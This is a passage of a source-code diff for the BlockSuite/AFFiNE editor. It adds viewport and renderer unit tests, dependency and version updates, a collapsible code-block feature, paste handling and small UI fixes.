selectedModels: Set<{ id: string; elementBound: Bound }>;
viewportModels: Set<{ id: string; elementBound: Bound }>;
viewportBounds: Bound;
nearbyActiveBlockLimit: number;
nearbyDistanceRatio: number;
}) => Set<{ id: string; elementBound: Bound }>;
}
).getLowZoomGestureActiveModels;
const nearest = createFakeBlockModel('nearest', 46, 46);
const farther = createFakeBlockModel('farther', 78, 78);
const activeModels = getLowZoomGestureActiveModels({
selectedModels: new Set(),
viewportModels: new Set([nearest, farther]),
viewportBounds: new Bound(0, 0, 100, 100),
nearbyActiveBlockLimit: 1,
nearbyDistanceRatio: 0.35,
});
expect([...activeModels].map(model => model.id)).toEqual(['nearest']);
});
test('starts post-gesture recovery immediately once gesture signals fully settle', () => {
expect('getPostGestureRecoveryDelay' in viewportModule).toBe(true);
const getPostGestureRecoveryDelay = (
viewportModule as {
getPostGestureRecoveryDelay: (params: {
isPanning: boolean;
isZooming: boolean;
fallbackDelayMs: number;
}) => number;
}
).getPostGestureRecoveryDelay;
expect(
getPostGestureRecoveryDelay({
isPanning: false,
isZooming: false,
fallbackDelayMs: 220,
})
).toBe(0);
});
test('keeps fallback post-gesture delay while a gesture signal is still active', () => {
expect('getPostGestureRecoveryDelay' in viewportModule).toBe(true);
const getPostGestureRecoveryDelay = (
viewportModule as {
getPostGestureRecoveryDelay: (params: {
isPanning: boolean;
isZooming: boolean;
fallbackDelayMs: number;
}) => number;
}
).getPostGestureRecoveryDelay;
expect(
getPostGestureRecoveryDelay({
isPanning: true,
isZooming: false,
fallbackDelayMs: 220,
})
).toBe(220);
expect(
getPostGestureRecoveryDelay({
isPanning: false,
isZooming: true,
fallbackDelayMs: 220,
})
).toBe(220);
});
test('sizes turbo renderer canvas with effective dpr at low zoom', () => {
viewportRuntimeConfig.CANVAS_DPR_CAP_BY_ZOOM = [
[0.5, 1],
[0.8, 2],
];
setDevicePixelRatio(2);
const canvas = document.createElement('canvas');
const host = document.createElement('div');
vi.spyOn(host, 'getBoundingClientRect').mockReturnValue(
createRect(200, 100)
);
(
syncCanvasSize as unknown as (
canvas: HTMLCanvasElement,
host: HTMLElement,
zoom: number
) => void
)(canvas, host, 0.4);
expect(canvas.width).toBe(200);
expect(canvas.height).toBe(100);
(
syncCanvasSize as unknown as (
canvas: HTMLCanvasElement,
host: HTMLElement,
zoom: number
) => void
)(canvas, host, 0.95);
expect(canvas.width).toBe(400);
expect(canvas.height).toBe(200);
});
test('paints turbo placeholders with effective dpr at low zoom', () => {
const previousTheme = document.documentElement.dataset.theme;
document.documentElement.dataset.theme = 'light';
try {
viewportRuntimeConfig.CANVAS_DPR_CAP_BY_ZOOM = [
[0.5, 1],
[0.8, 2],
];
setDevicePixelRatio(2);
const canvas = document.createElement('canvas');
const fillRect = vi.fn();
const strokeRect = vi.fn();
let fillStyle = '';
let strokeStyle = '';
vi.spyOn(canvas, 'getContext').mockReturnValue({
get fillStyle() {
return fillStyle;
},
set fillStyle(value: string) {
fillStyle = value;
},
get strokeStyle() {
return strokeStyle;
},
set strokeStyle(value: string) {
strokeStyle = value;
},
fillRect,
strokeRect,
} as unknown as CanvasRenderingContext2D);
const layout: ViewportLayoutTree = {
roots: [
{
blockId: 'root',
type: 'affine:page',
layout: {
blockId: 'root',
type: 'affine:page',
rect: { x: 0, y: 0, w: 50, h: 20 },
},
children: [],
},
],
overallRect: { x: 0, y: 0, w: 50, h: 20 },
};
const paintPlaceholderForTest =
paintPlaceholder as unknown as PaintPlaceholderForTest;
paintPlaceholderForTest(canvas, layout, {
zoom: 0.4,
toViewCoord: () => [0, 0],
});
expect(fillStyle).toBe('rgba(0, 0, 0, 0.04)');
expect(strokeStyle).toBe('rgba(0, 0, 0, 0.02)');
expect(fillRect).toHaveBeenLastCalledWith(0, 0, 20, 8);
paintPlaceholderForTest(canvas, layout, {
zoom: 0.95,
toViewCoord: () => [0, 0],
});
expect(fillRect).toHaveBeenLastCalledWith(0, 0, 95, 38);
} finally {
document.documentElement.dataset.theme = previousTheme;
}
});
});
@@ -0,0 +1,34 @@
import { ColorScheme } from '@blocksuite/affine-model';
import { describe, expect, it } from 'vitest';
import {
getAffinePlaceholderFillColor,
getAffinePlaceholderStrokeColor,
inferColorSchemeFromThemeMode,
} from '../../../../shared/src/theme/placeholder-style.js';
describe('affine placeholder style', () => {
it('returns subtle light placeholder colors', () => {
expect(getAffinePlaceholderFillColor(ColorScheme.Light)).toBe(
'rgba(0, 0, 0, 0.04)'
);
expect(getAffinePlaceholderStrokeColor(ColorScheme.Light)).toBe(
'rgba(0, 0, 0, 0.02)'
);
});
it('returns subtle dark placeholder colors', () => {
expect(getAffinePlaceholderFillColor(ColorScheme.Dark)).toBe(
'rgba(255, 255, 255, 0.08)'
);
expect(getAffinePlaceholderStrokeColor(ColorScheme.Dark)).toBe(
'rgba(255, 255, 255, 0.04)'
);
});
it('infers color scheme from theme mode', () => {
expect(inferColorSchemeFromThemeMode('dark')).toBe(ColorScheme.Dark);
expect(inferColorSchemeFromThemeMode('light')).toBe(ColorScheme.Light);
expect(inferColorSchemeFromThemeMode('')).toBe(ColorScheme.Light);
});
});
@@ -0,0 +1,66 @@
import { describe, expect, test } from 'vitest';
import * as turboRendererModule from '../../../../gfx/turbo-renderer/src/turbo-renderer.js';
describe('viewport turbo renderer policy', () => {
test.each([
{ isIOS: true, zoom: 0.4, hasBitmap: true, expected: true },
{ isIOS: true, zoom: 0.4, hasBitmap: false, expected: false },
{ isIOS: false, zoom: 0.4, hasBitmap: true, expected: false },
{ isIOS: true, zoom: 0.8, hasBitmap: true, expected: false },
])(
'prefers cached bitmap only for iOS low-zoom gestures with a bitmap %#',
({ isIOS, zoom, hasBitmap, expected }) => {
expect(
'shouldPreferBitmapCacheDuringLowZoomGesture' in turboRendererModule
).toBe(true);
const shouldPreferBitmapCacheDuringLowZoomGesture = (
turboRendererModule as {
shouldPreferBitmapCacheDuringLowZoomGesture: (params: {
isIOS: boolean;
zoom: number;
hasBitmap: boolean;
}) => boolean;
}
).shouldPreferBitmapCacheDuringLowZoomGesture;
expect(
shouldPreferBitmapCacheDuringLowZoomGesture({
isIOS,
zoom,
hasBitmap,
})
).toBe(expected);
}
);
test.each([
{ isIOS: true, zoom: 0.4, expected: false },
{ isIOS: true, zoom: 0.8, expected: true },
{ isIOS: false, zoom: 0.4, expected: true },
])(
'idles turbo blocks outside iOS low-zoom survival mode %#',
({ isIOS, zoom, expected }) => {
expect('shouldIdleTurboBlocksDuringZooming' in turboRendererModule).toBe(
true
);
const shouldIdleTurboBlocksDuringZooming = (
turboRendererModule as {
shouldIdleTurboBlocksDuringZooming: (params: {
isIOS: boolean;
zoom: number;
}) => boolean;
}
).shouldIdleTurboBlocksDuringZooming;
expect(
shouldIdleTurboBlocksDuringZooming({
isIOS,
zoom,
})
).toBe(expected);
}
);
});
+1 -1
View File
@@ -1,3 +1,3 @@
/* eslint-disable @typescript-eslint/no-restricted-imports */
/* oxlint-disable no-restricted-imports */
export * from '@blocksuite/store';
+6 -2
View File
@@ -1,3 +1,5 @@
import { fileURLToPath } from 'node:url';
import { vanillaExtractPlugin } from '@vanilla-extract/vite-plugin';
import { defineConfig } from 'vitest/config';
@@ -7,11 +9,13 @@ export default defineConfig({
},
plugins: [vanillaExtractPlugin()],
test: {
globalSetup: '../../../scripts/vitest-global.js',
globalSetup: fileURLToPath(
new URL('../../../scripts/vitest-global.js', import.meta.url)
),
include: ['src/__tests__/**/*.unit.spec.ts'],
testTimeout: 1000,
coverage: {
provider: 'istanbul', // or 'c8'
provider: 'istanbul',
reporter: ['lcov'],
reportsDirectory: '../../../.coverage/blocksuite-affine',
},
@@ -21,14 +21,10 @@
"@blocksuite/std": "workspace:*",
"@blocksuite/store": "workspace:*",
"@floating-ui/dom": "^1.6.13",
"@lit/context": "^1.1.2",
"@preact/signals-core": "^1.8.0",
"@toeverything/theme": "^1.1.23",
"file-type": "^21.0.0",
"lit": "^3.2.0",
"minimatch": "^10.1.1",
"rxjs": "^7.8.2",
"zod": "^3.25.76"
"rxjs": "^7.8.2"
},
"exports": {
".": "./src/index.ts",
@@ -41,5 +37,5 @@
"!src/__tests__",
"!dist/__tests__"
],
"version": "0.26.1"
"version": "0.26.3"
}
@@ -5,6 +5,7 @@ import {
import {
BlockMarkdownAdapterExtension,
type BlockMarkdownAdapterMatcher,
createAttachmentBlockSnapshot,
FOOTNOTE_DEFINITION_PREFIX,
getFootnoteDefinitionText,
isFootnoteDefinitionNode,
@@ -56,18 +57,15 @@ export const attachmentBlockMarkdownAdapterMatcher: BlockMarkdownAdapterMatcher
}
walkerContext
.openNode(
{
type: 'block',
createAttachmentBlockSnapshot({
id: nanoid(),
flavour: AttachmentBlockSchema.model.flavour,
props: {
name: fileName,
sourceId: blobId,
footnoteIdentifier,
style: 'citation',
},
children: [],
},
}),
'children'
)
.closeNode();
@@ -54,7 +54,7 @@ type AttachmentResolvedStateInfo = ResolvedStateInfo & {
@Peekable({
enableOn: ({ model }: AttachmentBlockComponent) => {
return !model.store.readonly && model.props.type.endsWith('pdf');
return model.props.type.endsWith('pdf');
},
})
export class AttachmentBlockComponent extends CaptionedBlockComponent<AttachmentBlockModel> {
@@ -144,7 +144,7 @@ export const attachmentViewDropdownMenu = {
@toggle=${onToggle}
.actions=${actions.value}
.context=${ctx}
.viewType$=${viewType$}
.viewTypeSignal=${viewType$}
></affine-view-dropdown-menu>`;
},
} as const satisfies ToolbarActionGroup<ToolbarAction>;
@@ -366,7 +366,7 @@ const builtinSurfaceToolbarConfig = {
@toggle=${onToggle}
.actions=${actions}
.context=${ctx}
.style$=${style$}
.styleSignal=${style$}
></affine-card-style-dropdown-menu>`
)}`;
},
@@ -22,17 +22,16 @@
"@blocksuite/icons": "^2.2.17",
"@blocksuite/std": "workspace:*",
"@blocksuite/store": "workspace:*",
"@lit/context": "^1.1.2",
"@preact/signals-core": "^1.8.0",
"@toeverything/theme": "^1.1.23",
"lit": "^3.2.0",
"minimatch": "^10.1.1",
"rxjs": "^7.8.2",
"yjs": "^13.6.27",
"zod": "^3.25.76"
"yjs": "^13.6.27"
},
"devDependencies": {
"vitest": "^3.2.4"
"@vitest/browser-playwright": "^4.1.8",
"playwright": "=1.58.2",
"vitest": "^4.1.8"
},
"exports": {
".": "./src/index.ts",
@@ -45,5 +44,5 @@
"!src/__tests__",
"!dist/__tests__"
],
"version": "0.26.1"
"version": "0.26.3"
}
@@ -108,7 +108,9 @@ export class BookmarkBlockComponent extends CaptionedBlockComponent<BookmarkBloc
}
open = () => {
window.open(this.link, '_blank');
const link = this.link;
if (!link) return;
window.open(link, '_blank', 'noopener,noreferrer');
};
refreshData = () => {
@@ -237,7 +237,7 @@ const builtinToolbarConfig = {
@toggle=${onToggle}
.actions=${actions}
.context=${ctx}
.viewType$=${viewType$}
.viewTypeSignal=${viewType$}
></affine-view-dropdown-menu>`
)}`;
},
@@ -282,7 +282,7 @@ const builtinToolbarConfig = {
@toggle=${onToggle}
.actions=${actions}
.context=${ctx}
.style$=${model.props.style$}
.styleSignal=${model.props.style$}
></affine-card-style-dropdown-menu>`
)}`;
},
@@ -472,7 +472,7 @@ const builtinSurfaceToolbarConfig = {
@toggle=${onToggle}
.actions=${actions}
.context=${ctx}
.viewType$=${viewType$}
.viewTypeSignal=${viewType$}
></affine-view-dropdown-menu>`
)}`;
},
@@ -534,7 +534,7 @@ const builtinSurfaceToolbarConfig = {
@toggle=${onToggle}
.actions=${actions}
.context=${ctx}
.style$=${style$}
.styleSignal=${style$}
></affine-card-style-dropdown-menu>`
)}`;
},
@@ -591,7 +591,7 @@ const builtinSurfaceToolbarConfig = {
@select=${onSelect}
@toggle=${onToggle}
.format=${format}
.size$=${scale$}
.sizeSignal=${scale$}
></affine-size-dropdown-menu>`
)}`;
},
@@ -1,3 +1,4 @@
import { playwright } from '@vitest/browser-playwright';
import { defineConfig } from 'vitest/config';
export default defineConfig({
@@ -8,10 +9,9 @@ export default defineConfig({
browser: {
enabled: true,
headless: true,
name: 'chromium',
provider: 'playwright',
instances: [{ browser: 'chromium' }],
provider: playwright(),
isolate: false,
providerOptions: {},
},
include: ['src/__tests__/**/*.unit.spec.ts'],
testTimeout: 500,
+2 -11
View File
@@ -17,22 +17,13 @@
"@blocksuite/affine-rich-text": "workspace:*",
"@blocksuite/affine-shared": "workspace:*",
"@blocksuite/affine-widget-slash-menu": "workspace:*",
"@blocksuite/global": "workspace:*",
"@blocksuite/icons": "^2.2.17",
"@blocksuite/std": "workspace:*",
"@blocksuite/store": "workspace:*",
"@emoji-mart/data": "^1.2.1",
"@emotion/css": "^11.13.5",
"@floating-ui/dom": "^1.6.10",
"@lit/context": "^1.1.2",
"@preact/signals-core": "^1.8.0",
"@toeverything/theme": "^1.1.23",
"@types/mdast": "^4.0.4",
"emoji-mart": "^5.6.0",
"lit": "^3.2.0",
"minimatch": "^10.1.1",
"rxjs": "^7.8.2",
"zod": "^3.25.76"
"lit": "^3.2.0"
},
"exports": {
".": "./src/index.ts",
@@ -45,5 +36,5 @@
"!src/__tests__",
"!dist/__tests__"
],
"version": "0.26.1"
"version": "0.26.3"
}
@@ -216,9 +216,13 @@ export class CalloutBlockComponent extends CaptionedBlockComponent<CalloutBlockM
override renderBlock() {
const icon = this.model.props.icon$.value;
const backgroundColorName = this.model.props.backgroundColorName$.value;
const normalizedBackgroundName =
backgroundColorName === 'default' || backgroundColorName === ''
? 'grey'
: backgroundColorName;
const backgroundColor = (
cssVarV2.block.callout.background as Record<string, string>
)[backgroundColorName ?? ''];
)[normalizedBackgroundName ?? 'grey'];
const iconContent = getIcon(icon);
@@ -68,14 +68,14 @@ const backgroundColorAction = {
${repeat(colors, color => {
const isDefault = color === 'default';
const value = isDefault
? null
? cssVarV2.block.callout.background.grey
: `var(--affine-text-highlight-${color})`;
const displayName = `${color} Background`;
return html`
<editor-menu-action
data-testid="background-${color}"
@click=${() => updateBackground(color)}
@click=${() => updateBackground(isDefault ? 'grey' : color)}
>
<affine-text-duotone-icon
style=${styleMap({
@@ -25,4 +25,4 @@ export const calloutTooltip = html`<svg width="170" height="106" viewBox="0 0 17
</clipPath>
</defs>
</svg>
`
`;
@@ -14,7 +14,6 @@
{ "path": "../../rich-text" },
{ "path": "../../shared" },
{ "path": "../../widgets/slash-menu" },
{ "path": "../../../framework/global" },
{ "path": "../../../framework/std" },
{ "path": "../../../framework/store" }
]
+1 -5
View File
@@ -26,13 +26,9 @@
"@blocksuite/std": "workspace:*",
"@blocksuite/store": "workspace:*",
"@floating-ui/dom": "^1.6.13",
"@lit/context": "^1.1.2",
"@preact/signals-core": "^1.8.0",
"@toeverything/theme": "^1.1.23",
"@types/mdast": "^4.0.4",
"lit": "^3.2.0",
"minimatch": "^10.1.1",
"rxjs": "^7.8.2",
"shiki": "^3.19.0",
"zod": "^3.25.76"
},
@@ -48,5 +44,5 @@
"!src/__tests__",
"!dist/__tests__"
],
"version": "0.26.1"
"version": "0.26.3"
}
@@ -1,4 +1,5 @@
import { deleteTextCommand } from '@blocksuite/affine-inline-preset';
import type { RichText } from '@blocksuite/affine-rich-text';
import {
HtmlAdapter,
pasteMiddleware,
@@ -18,6 +19,7 @@ import {
LifeCycleWatcher,
LifeCycleWatcherIdentifier,
StdIdentifier,
TextSelection,
type UIEventHandler,
} from '@blocksuite/std';
import type { ExtensionType } from '@blocksuite/store';
@@ -103,6 +105,30 @@ export class CodeBlockClipboardController extends LifeCycleWatcher {
const e = ctx.get('clipboardState').raw;
e.preventDefault();
const textSelection = this.std.selection.find(TextSelection);
const plainText = e.clipboardData
?.getData('text/plain')
?.replace(/\r?\n|\r/g, '\n');
const selectedBlockId = textSelection?.from.blockId;
const codeBlock = selectedBlockId
? this.std.store.getBlock(selectedBlockId)?.model
: null;
if (plainText && codeBlock?.flavour === 'affine:code' && selectedBlockId) {
const richText = this.std.view
.getBlock(selectedBlockId)
?.querySelector<RichText>('rich-text');
const inlineEditor = richText?.inlineEditor;
const inlineRange = inlineEditor?.getInlineRange();
if (inlineEditor && inlineRange) {
inlineEditor.insertText(inlineRange, plainText);
inlineEditor.setInlineRange({
index: inlineRange.index + plainText.length,
length: 0,
});
return true;
}
}
this.std.store.captureSync();
this.std.command
.chain()
@@ -39,10 +39,7 @@ export class CodeBlockHighlighter extends LifeCycleWatcher {
private readonly _loadTheme = async (
highlighter: HighlighterCore
): Promise<void> => {
// It is possible that by the time the highlighter is ready all instances
// have already been unmounted. In that case there is no need to load
// themes or update state.
if (CodeBlockHighlighter._refCount === 0) {
if (!CodeBlockHighlighter._isHighlighterInUse(highlighter)) {
return;
}
@@ -51,7 +48,17 @@ export class CodeBlockHighlighter extends LifeCycleWatcher {
const lightTheme = config?.theme?.light ?? CODE_BLOCK_DEFAULT_LIGHT_THEME;
this._darkThemeKey = (await normalizeGetter(darkTheme)).name;
this._lightThemeKey = (await normalizeGetter(lightTheme)).name;
if (!CodeBlockHighlighter._isHighlighterInUse(highlighter)) {
return;
}
await highlighter.loadTheme(darkTheme, lightTheme);
if (!CodeBlockHighlighter._isHighlighterInUse(highlighter)) {
return;
}
this.highlighter$.value = highlighter;
};
@@ -83,30 +90,18 @@ export class CodeBlockHighlighter extends LifeCycleWatcher {
}
override unmounted(): void {
CodeBlockHighlighter._refCount--;
CodeBlockHighlighter._refCount = Math.max(
0,
CodeBlockHighlighter._refCount - 1
);
this.highlighter$.value = null;
}
// Dispose the shared highlighter **after** any in-flight creation finishes.
if (CodeBlockHighlighter._refCount !== 0) {
return;
}
const doDispose = (highlighter: HighlighterCore | null) => {
if (highlighter) {
highlighter.dispose();
}
CodeBlockHighlighter._sharedHighlighter = null;
CodeBlockHighlighter._highlighterPromise = null;
};
if (CodeBlockHighlighter._sharedHighlighter) {
// Highlighter already created dispose immediately.
doDispose(CodeBlockHighlighter._sharedHighlighter);
} else if (CodeBlockHighlighter._highlighterPromise) {
// Highlighter still being created wait for it, then dispose.
CodeBlockHighlighter._highlighterPromise
.then(doDispose)
.catch(console.error);
}
private static _isHighlighterInUse(highlighter: HighlighterCore) {
return (
CodeBlockHighlighter._refCount > 0 &&
CodeBlockHighlighter._sharedHighlighter === highlighter
);
}
}
@@ -51,6 +51,10 @@ export class CodeBlockComponent extends CaptionedBlockComponent<CodeBlockModel>
return modelPreview;
});
collapsed$: Signal<boolean> = computed(
() => !!this.model.props.collapsed$.value
);
highlightTokens$: Signal<ThemedToken[][]> = signal([]);
languageName$: Signal<string> = computed(() => {
@@ -417,6 +421,7 @@ export class CodeBlockComponent extends CaptionedBlockComponent<CodeBlockModel>
CodeBlockPreviewIdentifier(this.model.props.language ?? '')
);
const shouldRenderPreview = preview && previewContext;
const collapsed = this.collapsed$.value;
return html`
<div
@@ -426,6 +431,7 @@ export class CodeBlockComponent extends CaptionedBlockComponent<CodeBlockModel>
mobile: IS_MOBILE,
wrap: this.model.props.wrap,
'disable-line-numbers': !showLineNumbers,
collapsed,
})}
>
<rich-text
@@ -453,9 +459,12 @@ export class CodeBlockComponent extends CaptionedBlockComponent<CodeBlockModel>
}}
>
</rich-text>
${collapsed
? html`<div class="code-collapsed-fade" aria-hidden="true"></div>`
: nothing}
<div
style=${styleMap({
display: shouldRenderPreview ? undefined : 'none',
display: shouldRenderPreview && !collapsed ? undefined : 'none',
})}
contenteditable="false"
class="affine-code-block-preview"
@@ -471,6 +480,10 @@ export class CodeBlockComponent extends CaptionedBlockComponent<CodeBlockModel>
this.store.updateBlock(this.model, { wrap });
}
setCollapsed(collapsed: boolean) {
this.store.updateBlock(this.model, { collapsed });
}
@query('rich-text')
private accessor _richTextElement: RichText | null = null;
@@ -9,9 +9,9 @@ import { WithDisposable } from '@blocksuite/global/lit';
import { noop } from '@blocksuite/global/utils';
import { MoreVerticalIcon } from '@blocksuite/icons/lit';
import { flip, offset } from '@floating-ui/dom';
import { effect } from '@preact/signals-core';
import { css, html, LitElement } from 'lit';
import { property, query, state } from 'lit/decorators.js';
import { styleMap } from 'lit/directives/style-map.js';
import type { CodeBlockToolbarContext } from '../context.js';
@@ -82,18 +82,10 @@ export class AffineCodeToolbar extends WithDisposable(LitElement) {
createLitPortal({
template: html`
<editor-menu-content
data-show
class="more-popup-menu"
style=${styleMap({
'--content-padding': '8px',
'--packed-height': '4px',
})}
>
<div data-size="large" data-orientation="vertical">
${renderGroups(this.moreGroups, this.context)}
</div>
</editor-menu-content>
<affine-code-more-menu
.context=${this.context}
.moreGroups=${this.moreGroups}
></affine-code-more-menu>
`,
// should be greater than block-selection z-index as selection and popover wil share the same stacking context(editor-host)
portalStyles: {
@@ -117,6 +109,17 @@ export class AffineCodeToolbar extends WithDisposable(LitElement) {
this.closeCurrentMenu();
}
override connectedCallback() {
super.connectedCallback();
// Mirror the collapsed$ signal from the block component into local @state
// so this LitElement re-renders when it changes.
this.disposables.add(
effect(() => {
this._collapsed = this.context.blockComponent.collapsed$.value;
})
);
}
override render() {
return html`
<editor-toolbar class="code-toolbar-container" data-without-bg>
@@ -145,6 +148,9 @@ export class AffineCodeToolbar extends WithDisposable(LitElement) {
@state()
private accessor _moreMenuOpen = false;
@state()
private accessor _collapsed = false;
@property({ attribute: false })
accessor context!: CodeBlockToolbarContext;
@@ -0,0 +1,52 @@
import type { MenuItemGroup } from '@blocksuite/affine-components/toolbar';
import { renderGroups } from '@blocksuite/affine-components/toolbar';
import { SignalWatcher, WithDisposable } from '@blocksuite/global/lit';
import { ShadowlessElement } from '@blocksuite/std';
import { html } from 'lit';
import { property } from 'lit/decorators.js';
import { styleMap } from 'lit/directives/style-map.js';
import type { CodeBlockToolbarContext } from '../context.js';
export class AffineCodeMoreMenu extends SignalWatcher(
WithDisposable(ShadowlessElement)
) {
override firstUpdated() {
this.disposables.add(
this.context.blockComponent.model.propsUpdated.subscribe(({ key }) => {
if (key === 'wrap' || key === 'lineNumber') {
this.requestUpdate();
}
})
);
}
override render() {
return html`
<editor-menu-content
data-show
class="more-popup-menu"
style=${styleMap({
'--content-padding': '8px',
'--packed-height': '4px',
})}
>
<div data-size="large" data-orientation="vertical">
${renderGroups(this.moreGroups, this.context)}
</div>
</editor-menu-content>
`;
}
@property({ attribute: false })
accessor context!: CodeBlockToolbarContext;
@property({ attribute: false })
accessor moreGroups!: MenuItemGroup<CodeBlockToolbarContext>[];
}
declare global {
interface HTMLElementTagNameMap {
'affine-code-more-menu': AffineCodeMoreMenu;
}
}
@@ -1,9 +1,11 @@
import {
CancelWrapIcon,
CaptionIcon,
CollapseCodeIcon,
CopyIcon,
DeleteIcon,
DuplicateIcon,
ExpandCodeIcon,
WrapIcon,
} from '@blocksuite/affine-components/icons';
import type { MenuItemGroup } from '@blocksuite/affine-components/toolbar';
@@ -85,6 +87,38 @@ export const PRIMARY_GROUPS: MenuItemGroup<CodeBlockToolbarContext>[] = [
};
},
},
{
type: 'collapse',
when: ({ doc }) => !doc.readonly,
generate: ({ blockComponent }) => {
return {
action: () => {
blockComponent.setCollapsed(!blockComponent.collapsed$.value);
},
render: item => {
const collapsed = blockComponent.collapsed$.value;
const icon = collapsed ? ExpandCodeIcon : CollapseCodeIcon;
const label = collapsed ? 'Expand code' : 'Collapse code';
return html`
<editor-icon-button
class="code-toolbar-button collapse"
aria-label=${label}
.tooltip=${label}
.tooltipOffset=${4}
.iconSize=${'16px'}
.iconContainerPadding=${4}
@click=${(e: MouseEvent) => {
e.stopPropagation();
item.action();
}}
>
${icon}
</editor-icon-button>
`;
},
};
},
},
{
type: 'caption',
label: 'Caption',
@@ -174,7 +208,8 @@ export const toggleGroup: MenuItemGroup<CodeBlockToolbarContext> = {
return html`
<editor-menu-action
@click=${() => {
blockComponent.setWrap(!wrapped);
const currentWrap = blockComponent.model.props.wrap;
blockComponent.setWrap(!currentWrap);
}}
aria-label=${label}
>
@@ -204,8 +239,10 @@ export const toggleGroup: MenuItemGroup<CodeBlockToolbarContext> = {
return html`
<editor-menu-action
@click=${() => {
const currentLineNumber =
blockComponent.model.props.lineNumber ?? true;
blockComponent.store.updateBlock(blockComponent.model, {
lineNumber: !lineNumber,
lineNumber: !currentLineNumber,
});
}}
aria-label=${label}
@@ -5,12 +5,14 @@ import {
} from './code-toolbar';
import { AffineCodeToolbar } from './code-toolbar/components/code-toolbar';
import { LanguageListButton } from './code-toolbar/components/lang-button';
import { AffineCodeMoreMenu } from './code-toolbar/components/more-menu';
import { PreviewButton } from './code-toolbar/components/preview-button';
import { AffineCodeUnit } from './highlight/affine-code-unit';
export function effects() {
customElements.define('language-list-button', LanguageListButton);
customElements.define('affine-code-toolbar', AffineCodeToolbar);
customElements.define('affine-code-more-menu', AffineCodeMoreMenu);
customElements.define(AFFINE_CODE_TOOLBAR_WIDGET, AffineCodeToolbarWidget);
customElements.define('affine-code-unit', AffineCodeUnit);
customElements.define('affine-code', CodeBlockComponent);
@@ -21,6 +23,7 @@ declare global {
interface HTMLElementTagNameMap {
'language-list-button': LanguageListButton;
'affine-code-toolbar': AffineCodeToolbar;
'affine-code-more-menu': AffineCodeMoreMenu;
'preview-button': PreviewButton;
[AFFINE_CODE_TOOLBAR_WIDGET]: AffineCodeToolbarWidget;
}
@@ -45,8 +45,10 @@ export class AffineCodeUnit extends ShadowlessElement {
if (!codeBlock || !vElement) return plainContent;
const tokens = codeBlock.highlightTokens$.value;
if (tokens.length === 0) return plainContent;
const line = tokens[vElement.lineIndex];
if (!line) return plainContent;
// copy the tokens to avoid modifying the original tokens
const lineTokens = structuredClone(tokens[vElement.lineIndex]);
const lineTokens = structuredClone(line);
if (lineTokens.length === 0) return plainContent;
const startOffset = vElement.startOffset;
@@ -27,6 +27,16 @@ export const codeBlockStyles = css`
${scrollbarStyle('.affine-code-block-container rich-text')}
/* In Chromium 121+, non-auto scrollbar-width/color override ::-webkit-scrollbar styles. */
@supports not selector(::-webkit-scrollbar) {
.affine-code-block-container rich-text {
scrollbar-width: thin;
scrollbar-color: ${unsafeCSSVarV2('icon/secondary', '#b1b1b1')}
transparent;
scrollbar-gutter: stable both-edges;
}
}
.affine-code-block-container .inline-editor {
font-family: var(--affine-font-code-family);
font-variant-ligatures: none;
@@ -70,4 +80,35 @@ export const codeBlockStyles = css`
affine-code .affine-code-block-preview {
padding: 12px;
}
/* ── Collapsed state ──────────────────────────────────────────────── */
/* Clamp the rich-text to the first 8 lines */
.affine-code-block-container.collapsed rich-text {
display: block;
max-height: calc(8 * var(--affine-line-height));
overflow: hidden;
}
/* Reduce bottom padding so the fade sits flush with the border */
.affine-code-block-container.collapsed {
padding-bottom: 0;
}
/* Gradient overlay that fades to the block background */
.affine-code-block-container .code-collapsed-fade {
position: absolute;
bottom: 0;
left: 0;
right: 0;
height: 80px;
background: linear-gradient(
to bottom,
transparent,
var(--affine-background-code-block)
);
border-radius: 0 0 10px 10px;
pointer-events: none;
z-index: 1;
}
`;
@@ -21,15 +21,9 @@
"@blocksuite/icons": "^2.2.17",
"@blocksuite/std": "workspace:*",
"@blocksuite/store": "workspace:*",
"@floating-ui/dom": "^1.6.13",
"@lit/context": "^1.1.2",
"@preact/signals-core": "^1.8.0",
"@toeverything/theme": "^1.1.23",
"@types/mdast": "^4.0.4",
"lit": "^3.2.0",
"minimatch": "^10.1.1",
"rxjs": "^7.8.2",
"zod": "^3.25.76"
"rxjs": "^7.8.2"
},
"exports": {
".": "./src/index.ts",
@@ -42,5 +36,5 @@
"!src/__tests__",
"!dist/__tests__"
],
"version": "0.26.1"
"version": "0.26.3"
}
@@ -254,6 +254,7 @@ export class DataViewBlockComponent extends CaptionedBlockComponent<DataViewBloc
dataSource: this.dataSource,
headerWidget: this.headerWidget,
clipboard: this.std.clipboard,
dnd: this.std.dnd,
notification: {
toast: message => {
const notification = this.std.getOptional(NotificationProvider);
@@ -26,14 +26,11 @@
"@blocksuite/store": "workspace:*",
"@emotion/css": "^11.13.5",
"@floating-ui/dom": "^1.6.13",
"@lit/context": "^1.1.2",
"@preact/signals-core": "^1.8.0",
"@toeverything/theme": "^1.1.23",
"@types/mdast": "^4.0.4",
"date-fns": "^4.0.0",
"lit": "^3.2.0",
"minimatch": "^10.1.1",
"rxjs": "^7.8.2",
"yjs": "^13.6.27",
"zod": "^3.25.76"
},
@@ -48,5 +45,5 @@
"!src/__tests__",
"!dist/__tests__"
],
"version": "0.26.1"
"version": "0.26.3"
}
@@ -54,9 +54,9 @@ type Cell = {
value: string | { delta: DeltaInsert[] };
};
export const processTable = (
columns: ColumnDataType[],
children: BlockSnapshot[],
cells: SerializedCells
columns: ColumnDataType[] = [],
children: BlockSnapshot[] = [],
cells: SerializedCells = {}
): Table => {
const table: Table = {
headers: columns,
@@ -90,13 +90,17 @@ export const processTable = (
return;
}
let value: string | { delta: DeltaInsert[] };
if (isDelta(cell.value)) {
value = cell.value;
} else {
value = property.config.rawValue.toString({
value: cell.value,
data: col.data,
});
try {
if (isDelta(cell.value)) {
value = cell.value;
} else {
value = property.config.rawValue.toString({
value: cell.value,
data: col.data,
});
}
} catch {
value = '';
}
row.cells.push({
value,
@@ -6,6 +6,7 @@ import { viewPresets } from '@blocksuite/data-view/view-presets';
import {
DatabaseKanbanViewIcon,
DatabaseTableViewIcon,
TodayIcon,
} from '@blocksuite/icons/lit';
import { insertDatabaseBlockCommand } from '../commands';
@@ -47,6 +48,35 @@ export const databaseSlashMenuConfig: SlashMenuConfig = {
},
},
{
name: 'Calendar View',
description: 'Display items by date in a calendar.',
searchAlias: ['database', 'calendar'],
icon: TodayIcon(),
group: '7_Database@1',
when: ({ model }) =>
!isInsideBlockByFlavour(model.store, model, 'affine:edgeless-text'),
action: ({ std }) => {
std.command
.chain()
.pipe(getSelectedModelsCommand)
.pipe(insertDatabaseBlockCommand, {
viewType: viewPresets.calendarViewMeta.type,
place: 'after',
